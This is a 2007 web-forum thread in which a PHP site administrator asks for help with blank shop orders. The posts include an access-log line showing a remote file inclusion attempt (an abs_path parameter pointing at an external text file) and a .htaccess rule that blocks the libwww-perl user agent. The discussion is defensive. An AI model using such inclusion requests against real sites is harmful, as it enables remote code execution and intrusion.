| Author |
Message |
dad7732
RavenNuke(tm) Development Team
Joined: Mar 18, 2007
Posts: 1191
|
 Posted:
Tue Aug 07, 2007 9:35 am |
 
|
Been running Sentinel for a long time so I have to ask ... Is there some sort of Sentinel type protection application for a regular PHP type site, not Nuke?
I have a customer where we're running a site written in plain old PHP. The site uses Sunshop for ordering and there are several blank orders coming through. Looking at the logs there are several lines using the /checkout.php/ for example:
| Code: | | "GET /shop/checkout.php?abs_path=http://www.italiandirectory.com/cache/echo.txt? HTTP/1.1" 200 23661 "-" "libwww-perl/5.807" |
I can't figure out the attempted exploit as there is nothing intrusive happening that I can see.
Posting this here as you guys have been VERY helpful with previous issues, etc.
Thanks, Jay |
|
|
|
|
Captain_Computer
Hangin' Around
Joined: May 30, 2004
Posts: 46
|
| Posted:
Tue Aug 07, 2007 10:06 am |
|
Do a search on the forums for:
There are numerous posts indicating how to stop those type of attacks using your (dot)htaccess file.
As for having Sentinel type program working with other than Nuke sites, there isn't anything published. But I have managed to get Sentinel working with Subdreamer CMS and IPB forums on my local machine. |
|
|
|
|
Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
|
| Posted:
Tue Aug 07, 2007 11:10 am |
|
They are probably just wildy throwing things at your scripts, not knowing what type of software you have. That attack may be meant for another CMS for example.
Their user agent means they are using a Perl script to access your site, not a browser. The user agent can easily be spoofed however. You can use .htaccess to block those user agents, as discussed in other threads.
As far as using Sentinel on a non-Nuke PHP site, you could probably get it to work, but I would just ensure you are propertly sanitizing all inputs. And turn register_globals off. |
|
|
|
|
|
dad7732
RavenNuke(tm) Development Team
Joined: Mar 18, 2007
Posts: 1191
|
| Posted:
Tue Aug 07, 2007 11:26 am |
|
Didn't think about the .htaccess but that makes sense, thanks for jogging the memory. The script seems to be innocuous but it's rather annoying to the customer because every time they try, it causes a blank order to be generated.
register_globals has to be ON for the time being, other sites need it on.
Will report back with success .. thanks all. |
|
|
|
|
|
dad7732
RavenNuke(tm) Development Team
Joined: Mar 18, 2007
Posts: 1191
|
| Posted:
Tue Aug 07, 2007 12:03 pm |
|
This one in the .htaccess file did the trick. Error_log loaded with "Denied by server configuration" in the last 1/2 hr.
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots
Thanks to all ..... Jay |
|
|
|
|
|
Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
|
| Posted:
Tue Aug 07, 2007 6:12 pm |
|
|
|
|
|
Captain_Computer
Hangin' Around
Joined: May 30, 2004
Posts: 46
|
| Posted:
Tue Aug 07, 2007 8:47 pm |
|
Your welcome. It is really refreshing that after a problem is solved that the person comes back and thanks the community. |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
